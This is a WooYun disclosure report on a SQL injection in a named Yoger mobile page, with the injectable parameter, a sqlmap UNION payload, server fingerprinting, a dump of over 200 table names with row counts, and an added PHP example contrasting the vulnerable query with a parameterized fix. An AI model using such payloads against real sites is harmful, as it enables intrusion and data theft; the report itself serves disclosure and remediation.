
Vulnerability summary

Defect ID: wooyun-2015-0103967

Title: A Yoger (优个网) site has a SQL injection vulnerability

Vendor: yoger.com.cn

Author: 疏懒

Submitted: 2015-03-27 15:58

Fixed: 2015-05-14 09:18

Disclosed: 2015-05-14 09:18

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-27: Details sent to the vendor, awaiting vendor handling
2015-03-30: Vendor confirmed; details visible to the vendor only
2015-04-09: Details disclosed to core white hats and relevant domain experts
2015-04-19: Details disclosed to regular white hats
2015-04-29: Details disclosed to intern white hats
2015-05-14: Details disclosed to the public

Brief description:

A Yoger (优个网) site has a SQL injection vulnerability.

Detailed description:

Injection point:

http://m.yoger.com.cn/poster.php?zcid=569&fromtype=wap


A single-quote probe produced an error message that disclosed the script's absolute path on the server.



Testing shows the fromtype parameter is injectable.

Proof of vulnerability:

sqlmap identified the following injection points with a total of 137 HTTP(s) requests:
---
Place: GET
Parameter: fromtype
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: zcid=569&fromtype=wap' UNION ALL SELECT NULL,CHAR(58) CHAR(107) CHAR(113) CHAR(107) CHAR(58) CHAR(65) CHAR(90) CHAR(79) CHAR(83) CHAR(114) CHAR(68) CHAR(97) CHAR(119) CHAR(108) CHAR(120) CHAR(58) CHAR(115) CHAR(118) CHAR(99) CHAR(58),NULL,NULL,NULL,NULL,NULL--
---
[17:31:28] [INFO] testing Microsoft SQL Server
[17:31:28] [INFO] confirming Microsoft SQL Server
[17:31:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: PHP 5.2.11, Apache 2.2.13
back-end DBMS: Microsoft SQL Server 2000




Enumerating the database "cn36008" found more than 200 tables:

Database: cn36008
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| dbo.syncobj_0x4645343244413736 | 870347 |
| dbo.Uto_poDetail | 870347 |
| dbo.syncobj_0x3538323538363734 | 861565 |
| dbo.Uto_poFlow | 861563 |
| dbo.syncobj_0x3743304131423830 | 629197 |
| dbo.Uto_sList | 629196 |
| dbo.syncobj_0x4331394132394346 | 446921 |
| dbo.Uto_fList | 446921 |
| dbo.syncobj_0x3534453846373443 | 283657 |
| dbo.Uto_msgbox | 283657 |
| dbo.syncobj_0x4236463744333743 | 273882 |
| dbo.Uto_tosumFree | 273882 |
| dbo.syncobj_0x3239333636393234 | 273645 |
| dbo.Uto_fAccount | 273645 |
| dbo.syncobj_0x3438314438394637 | 267553 |
| dbo.Uto_porder | 267553 |
| dbo.syncobj_0x4632343644304242 | 258630 |
| dbo.Uto_Utor | 258630 |
| dbo.syncobj_0x3541384534344236 | 255391 |
| dbo.Uto_prdComState | 255389 |
| dbo.syncobj_0x4338454436444636 | 227338 |
| dbo.Uto_prdComment | 227338 |
| dbo.syncobj_0x3037384431314430 | 157706 |
| dbo.Uto_Score | 157705 |
| dbo.syncobj_0x4239343233323832 | 156003 |
| dbo.Uto_unClick | 156002 |
| dbo.syncobj_0x3238454644314135 | 111033 |
| dbo.Uto_custom | 111033 |
| dbo.syncobj_0x3143313739363030 | 103273 |
| dbo.Uto_UtorContact | 103273 |
| dbo.syncobj_0x3538413939433133 | 97830 |
| dbo.Uto_ordQuestion | 97830 |
| dbo.syncobj_0x3845303933363634 | 88581 |
| dbo.Uto_prdFavorite | 88581 |
| dbo.syncobj_0x3245394630383231 | 57040 |
| dbo.Uto_card | 57040 |
| dbo.syncobj_0x4344463342313835 | 54596 |
| dbo.Uto_unOrderflow | 54596 |
| dbo.syncobj_0x4430334537373141 | 50841 |
| dbo.Uto_Linkprd | 50841 |
| dbo.syncobj_0x4145383244413132 | 49602 |
| dbo.Uto_prdspec | 49602 |
| dbo.syncobj_0x4342383433364231 | 37964 |
| dbo.Uto_tList | 37963 |
| dbo.qz_user | 35754 |
| dbo.syncobj_0x3538393242443843 | 35754 |
| dbo.syncobj_0x3536423246363344 | 30962 |
| dbo.Yoger_buyerIdea | 30962 |
| dbo.syncobj_0x3435453035333142 | 28960 |
| dbo.Uto_prdPic | 28960 |
| dbo.syncobj_0x4437393236413045 | 27839 |
| dbo.Yoger_prdSku | 27839 |
| dbo.syncobj_0x3930344543423435 | 26595 |
| dbo.Uto_tuanList | 26595 |
| dbo.syncobj_0x3037374632343535 | 25722 |
| dbo.Yoger_prdSku_spec | 25722 |
| dbo.syncobj_0x4638443331374436 | 20252 |
| dbo.Uto_info | 20252 |
| dbo.Uto_cart | 17382 |
| dbo.syncobj_0x4246343039423333 | 9951 |
| dbo.Uto_product | 9951 |
| dbo.syncobj_0x4436324445384646 | 9921 |
| dbo.Yoger_prdKey | 9921 |
| dbo.syncobj_0x4541383234304531 | 6306 |
| dbo.Uto_bbsInfo | 6306 |
| dbo.syncobj_0x4635454231354639 | 5800 |
| dbo.Uto_bbsComment | 5800 |
| dbo.syncobj_0x3938424638463234 | 5124 |
| dbo.Uto_present | 5124 |
| dbo.syncobj_0x3843304630373635 | 4214 |
| dbo.Uto_ExSort | 4214 |
| dbo.syncobj_0x3032413444414334 | 3824 |
| dbo.Uto_sysLog | 3824 |
| dbo.Uto_region | 3562 |
| dbo.syncobj_0x3632383246303938 | 2649 |
| dbo.Yoger_orgerMenu | 2649 |
| dbo.syncobj_0x3134424143303637 | 2460 |
| dbo.Uto_infoComment | 2460 |
| dbo.syncobj_0x3136364330363938 | 2340 |
| dbo.Yoger_OutOfStockLog | 2340 |
| dbo.syncobj_0x3333343133384645 | 2263 |
| dbo.Yoger_partnerList | 2263 |
| dbo.syncobj_0x3038463432433743 | 1937 |
| dbo.Uto_partner | 1937 |
| dbo.syncobj_0x3246353236313934 | 1817 |
| dbo.Uto_DD | 1817 |
| dbo.syncobj_0x4143414242353134 | 1504 |
| dbo.Uto_search | 1504 |
| dbo.syncobj_0x4241453737313232 | 1396 |
| dbo.Yoger_tuihuo | 1396 |
| dbo.syncobj_0x4433383744443245 | 1102 |
| dbo.Uto_exchange | 1102 |
| dbo.syncobj_0x3046453132394433 | 922 |
| dbo.Yoger_PriceList | 922 |
| dbo.syncobj_0x4335424338453244 | 829 |
| dbo.Yoger_keywords | 829 |
| dbo.sysconstraints | 633 |
| dbo.syncobj_0x3146423537434641 | 571 |
| dbo.Yoger_adsManage | 571 |
| dbo.syncobj_0x4244393131323330 | 570 |
| dbo.Uto_unAlist | 570 |
| dbo.syncobj_0x3331373545393337 | 438 |
| dbo.Uto_prdSort | 438 |
| dbo.syncobj_0x4534464444433641 | 424 |
| dbo.Yoger_prdPersonal | 424 |
| dbo.syncobj_0x4531363132434635 | 346 |
| dbo.Uto_limitTime | 346 |
| dbo.syncobj_0x3642383335373030 | 339 |
| dbo.Yoger_detection | 339 |
| dbo.syncobj_0x3335423435363632 | 333 |
| dbo.Uto_tuan | 333 |
| dbo.syncobj_0x3932353535343342 | 294 |
| dbo.Yoger_stiga | 294 |
| dbo.qz_order | 253 |
| dbo.syncobj_0x4132324634364446 | 253 |
| dbo.syncobj_0x4535383334413543 | 242 |
| dbo.Uto_unadsList | 242 |
| dbo.syssubscriptions | 208 |
| dbo.syncobj_0x4434314541393035 | 178 |
| dbo.Uto_formula | 178 |
| dbo.syncobj_0x3131393746453636 | 176 |
| dbo.Uto_unAccount | 176 |
| dbo.syncobj_0x3735414433363632 | 173 |
| dbo.Yoger_prdBrand | 173 |
| dbo.syncobj_0x4331333938353645 | 169 |
| dbo.Uto_unioner | 169 |
| dbo.qz_actioners | 168 |
| dbo.syncobj_0x3939434530363044 | 168 |
| dbo.syncobj_0x3931374135424542 | 149 |
| dbo.Uto_infoSort | 149 |
| dbo.syncobj_0x3341364234353144 | 129 |
| dbo.Yoger_buyfree | 129 |
| dbo.syncobj_0x4535464139443435 | 122 |
| dbo.wap_zhuanchang | 122 |
| dbo.syncobj_0x3936384636384233 | 120 |
| dbo.Uto_sysMenu | 120 |
| dbo.sysextendedarticlesview | 104 |
| dbo.sysarticles | 103 |
| dbo.syncobj_0x3443393930423342 | 102 |
| dbo.Uto_auList | 102 |
| dbo.syncobj_0x3235433442443934 | 99 |
| dbo.Yoger_alterList | 99 |
| dbo.syncobj_0x3642313631333042 | 68 |
| dbo.Uto_payment | 68 |
| dbo.syncobj_0x3535343536443339 | 65 |
| dbo.Yoger_puorderDetail | 65 |
| dbo.uto_suggest | 57 |
| dbo.syncobj_0x4537374231463046 | 50 |
| dbo.Uto_aucomment | 50 |
| dbo.syncobj_0x3445303137464145 | 49 |
| dbo.Uto_poAlert | 49 |
| dbo.syncobj_0x4537324335383045 | 38 |
| dbo.Yoger_giftInfo | 38 |
| dbo.syncobj_0x3833343745313841 | 37 |
| dbo.Uto_orger | 37 |
| dbo.syncobj_0x3037374230394335 | 35 |
| dbo.Yoger_cardAuto | 35 |
| dbo.syncobj_0x3630324244393343 | 34 |
| dbo.Yoger_invi | 34 |
| dbo.syncobj_0x4334303037323635 | 31 |
| dbo.Uto_auTorder | 31 |
| dbo.qz_smrz | 28 |
| dbo.syncobj_0x3232394644423238 | 28 |
| dbo.syncobj_0x3241304534313542 | 27 |
| dbo.Yoger_alter_persent | 27 |
| dbo.syncobj_0x3631394330454536 | 26 |
| dbo.Uto_bbsSort | 26 |
| dbo.syncobj_0x3143433638343038 | 20 |
| dbo.Yoger_giftList | 20 |
| dbo.syncobj_0x4544433745413330 | 19 |
| dbo.Yoger_giftCard | 19 |
| dbo.syncobj_0x3834333732444533 | 14 |
| dbo.Yoger_purchaseOrder | 14 |
| dbo.qz_account | 12 |
| dbo.syncobj_0x3243413135393937 | 12 |
| dbo.syncobj_0x3635314230453945 | 12 |
| dbo.syncobj_0x4330364345313637 | 12 |
| dbo.syncobj_0x4637433930393432 | 12 |
| dbo.Uto_poTo | 12 |
| dbo.Uto_sysSet | 12 |
| dbo.Yoger_infoTopic | 12 |
| dbo.fx_product | 10 |
| dbo.qz_travelers | 9 |
| dbo.syncobj_0x3346364544333838 | 9 |
| dbo.syncobj_0x4146333941424442 | 9 |
| dbo.Uto_unionads | 9 |
| dbo.syncobj_0x3332343935373235 | 8 |
| dbo.Uto_auction | 8 |
| dbo.syncobj_0x3835313034314543 | 7 |
| dbo.syncobj_0x3946454645324131 | 7 |
| dbo.Uto_orgGroup | 7 |
| dbo.Uto_orgRole | 7 |
| dbo.syncobj_0x3141423646443632 | 6 |
| dbo.syncobj_0x3542414637453544 | 6 |
| dbo.syncobj_0x4133443944434142 | 6 |
| dbo.Uto_orgDept | 6 |
| dbo.Yoger_msgboxAuto | 6 |
| dbo.Yoger_productTopic | 6 |
| dbo.syncobj_0x4143443046304241 | 3 |
| dbo.syssegments | 3 |
| dbo.Uto_UtorLayer | 3 |
| dbo.syncobj_0x3130434237344245 | 1 |
| dbo.syncobj_0x3830413543343336 | 1 |
| dbo.syncobj_0x4536384239413437 | 1 |
| dbo.syspublications | 1 |
| dbo.sysschemaarticles | 1 |
| dbo.Uto_org | 1 |
| dbo.Uto_poSet | 1 |
| dbo.Yoger_sortTopic | 1 |
+--------------------------------+---------+


I didn't dig any further... hoping for a high score.

Fix recommendation:

You know what to do.
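The fix the report leaves implicit, written out as an added example that is not the site's own poster.php: the injectable query pattern beside a parameterized version in PHP, the stack sqlmap reported. The table name wap_zhuanchang comes from the dump above; its column names, the allowed fromtype values and the connection details are assumptions.

```php
<?php
// Added example, not the site's actual poster.php: the injectable pattern the
// report describes, beside a hardened version. The table wap_zhuanchang appears
// in the sqlmap output; its columns (zcid, fromtype, title, url) are assumptions.

// Vulnerable: request values are spliced into the SQL text. A value such as
// fromtype=wap' UNION ALL SELECT ... -- closes the quoted literal and appends
// attacker-controlled SQL, which is exactly what sqlmap found.
function poster_vulnerable(PDO $db, array $get)
{
    $zcid     = $get['zcid'];
    $fromtype = $get['fromtype'];
    $sql = "SELECT title, url FROM wap_zhuanchang "
         . "WHERE zcid = $zcid AND fromtype = '$fromtype'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: allow-list the enum-like parameter, cast the numeric id, and bind
// both as parameters so no request byte is ever interpreted as SQL.
function poster_hardened(PDO $db, array $get)
{
    $allowed  = array('wap', 'web');   // assumption: fromtype is a small fixed set
    $fromtype = isset($get['fromtype']) ? $get['fromtype'] : '';
    if (!in_array($fromtype, $allowed, true)) {
        header('HTTP/1.1 400 Bad Request');
        exit('invalid fromtype');
    }
    $zcid = isset($get['zcid']) ? (int) $get['zcid'] : 0;

    $stmt = $db->prepare('SELECT title, url FROM wap_zhuanchang '
                       . 'WHERE zcid = :zcid AND fromtype = :fromtype');
    $stmt->bindValue(':zcid', $zcid, PDO::PARAM_INT);
    $stmt->bindValue(':fromtype', $fromtype, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The single-quote probe also leaked the script's absolute path through a PHP
// error message. Keep errors out of the response and route exceptions to a
// generic handler (DB_HOST/DB_USER/DB_PASSWORD are placeholders).
ini_set('display_errors', '0');
try {
    $db = new PDO('dblib:host=DB_HOST;dbname=cn36008', 'DB_USER', 'DB_PASSWORD');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $rows = poster_hardened($db, $_GET);
} catch (PDOException $e) {
    error_log($e->getMessage());          // server-side log only
    header('HTTP/1.1 500 Internal Server Error');
    exit('temporary error');
}
```

With the dblib driver against SQL Server 2000 the prepare is emulated client-side, which still quotes bound values correctly; the allow-list and integer cast mean the query text never depends on that alone.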

Copyright notice: please credit the source when reposting: 疏懒@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-03-30 09:17

Vendor reply:

It is already being handled, thanks!

Latest status:

None yet